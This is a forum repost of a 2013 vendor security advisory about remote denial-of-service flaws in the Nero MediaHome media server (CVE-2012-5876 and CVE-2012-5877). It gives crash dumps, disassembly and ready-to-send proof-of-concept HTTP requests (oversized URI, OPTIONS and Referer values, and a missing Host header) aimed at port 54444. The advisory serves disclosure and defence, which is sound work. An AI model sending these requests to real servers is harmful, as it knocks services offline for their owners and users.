Post Thu Jan 10, 2013 12:42 pm

HTB23130: Nero MediaHome Multiple Remote DoS Vulnerabilities

Advisory ID: HTB23130
Product: Nero MediaHome
Vendor: Nero
Vulnerable Versions: 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012
Public Disclosure: January 9, 2013
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low
Discovered and Provided: High-Tech Bridge Security Research Lab


Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.


1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876

1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.

Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 ( 62040072) -> (heap)
EBX: 003e0000 ( 4063232) -> b@>@>" (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b2b000 ( 62042112) -> D (heap)
ESI: 03b2a800 ( 62040064) -> (heap)
EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 ( 4063232) -> b@>@>" (heap)
+04: 00000022 ( 34) -> N/A
+08: 003e0004 ( 4063236) -> b@>@>" (heap)
+0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A

Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]

Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None


1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.

Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 ( 62271496) -> (heap)
EBX: 003e0000 ( 4063232) -> # 8@>+ (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b64000 ( 62275584) -> B (heap)
ESI: 03b63000 ( 62271488) -> (heap)
EBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 ( 4063232) -> # 8@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> # 8@>+ (heap)
+0c: 0527f89c ( 86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A

Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]

Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None


1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.

Crash details:
EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 ( 4063232) -> @>+ (heap)
ECX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 ( 62193921) -> N/A
EDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 ( 63028104) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 ( 54262904) -> L;L (stack)
ESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 ( 4063232) -> @>+ (heap)
+04: 03c1bb78 ( 63028088) -> >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 ( 0) -> N/A
+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)

Disasm around:
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
0x7c920a3c cmp eax,ecx

Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com


1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server.

Crash details:
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 ( 4063232) -> Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 ( 86505512) -> `' (stack)
ESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 ( 4063232) -> Tp@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> Tp@>+ (heap)
+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)

Disasm around:
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]

Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]


2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877

2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.

Crash details:
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 ( 0) -> N/A
EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea ( 60612074) -> localhost (heap)
EDX: 039cddea ( 60612074) -> localhost (heap)
EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 ( 9) -> N/A
ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
+08: 00000000 ( 0) -> N/A
+0c: 00000001 ( 1) -> N/A
+10: 000000b8 ( 184) -> N/A
+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)

Disasm around:
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20

Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com

Solution:
Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."

As a temporary solution it is advised to remove the vulnerable application from your system.


References:
[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.
[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
Last edited by AndyP on Fri Jan 11, 2013 2:31 pm, edited 1 time in total.